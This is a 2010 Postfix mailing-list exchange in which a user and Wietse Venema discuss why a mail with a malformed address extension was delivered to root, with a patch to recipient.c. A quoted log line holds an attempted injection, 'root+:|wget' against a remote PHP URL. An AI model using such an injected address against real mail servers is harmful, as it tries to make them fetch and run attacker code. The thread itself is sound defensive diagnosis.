On 22.04.2010 14:47, Wietse Venema wrote:
> Arno Schäfer:
>> Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address
>> with illegal extension: root+:|wget http://fortunes.in/x1x.php
>
> You did't mention in the initial report that Postfix rejected the
> extension, because that makes all the difference in the world.
Yes. I should have looked up the mail.log right away, sorry about that.
> Apparently, the Postfix local delivery agent does not distinguish
> between "there is no address extension" and "there is an address
> extension, but it is invalid". In both cases, it only runs the
> full address local-part through the alias mapping.
Ok, so if I understand that correctly, if the extension is valid, the
local delivery agent checks if there is an alias for the address WITH
extension, and if not, falls back to the alias WITHOUT extension. But if
the extension is invalid, it does not realize that and looks for an
alias with the invalid extension, does not find one, and then decides to
attempt to deliver locally.
Just to be sure: why then is the mail delivered to root, rather than
rejected? That would mean that the local delivery agent, AFTER deciding
to deliver locally, in another part of the code again checks for an
extension in the full address local-part and in that case, handles it
correctly, right?
In any case, I understand that this is not a security issue, so that is
certainly most important.
Best Regards,
Arno
>
> Again, this has nothing to do with "|" characters in address
> extensions.
>
> Wietse
>
> The workaround is to replace the broken extension by the string
> "invalid". It would be incorrect to remove the evidence of the
> attack by patching the full address local-part, and it would take
> too much time to change the code to distinguish between "there is
> no address extension" and "there is an address extension, but it
> is invalid".
>
> *** ./recipient.c- Sat Feb 6 09:31:55 2010
> --- ./recipient.c Thu Apr 22 08:35:33 2010
> ***************
> *** 258,264 ****
> if (state.msg_attr.extension && strchr(state.msg_attr.extension, '/')) {
> msg_warn("%s: address with illegal extension: %s",
> state.msg_attr.queue_id, state.msg_attr.local);
> ! state.msg_attr.extension = 0;
> }
> } else
> state.msg_attr.extension = 0;
> --- 258,264 ----
> if (state.msg_attr.extension && strchr(state.msg_attr.extension, '/')) {
> msg_warn("%s: address with illegal extension: %s",
> state.msg_attr.queue_id, state.msg_attr.local);
> ! state.msg_attr.extension = "invalid";
> }
> } else
> state.msg_attr.extension = 0;
>
--
Arno Schäfer
IT-Beratung & Softwareentwicklung
PHP - Java - Web-Anwendungen
Linux/Unix - MySQL - Hochverfügbarkeit - Security
Weilbornstraße 10 - 63303 Dreieich
mailto: arno_schae...@gmx.de
Tel. +49-6103-699967 | Mobil +49-171-7939236
